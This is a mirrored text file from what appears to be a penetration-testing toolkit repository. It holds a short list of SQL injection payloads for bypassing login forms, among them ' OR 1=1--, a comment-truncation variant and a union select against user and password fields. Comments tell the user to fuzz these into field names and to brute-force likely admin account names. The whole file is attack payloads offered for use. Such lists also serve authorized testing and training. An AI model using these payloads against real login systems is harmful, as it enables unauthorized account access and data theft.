mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-05-02 14:56:10 -04:00
8 lines
374 B
Text
Executable file
8 lines
374 B
Text
Executable file
# regex replace as many as you can with your fuzzer for best results:
|
|
# <user-fieldname> <pass-fieldname> <username>
|
|
# also try to brute force a list of possible usernames, including possile admin acct names
|
|
<username>' OR 1=1--
|
|
'OR '' = ' Allows authentication without a valid username.
|
|
<username>'--
|
|
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
|
|
'OR 1=1--
|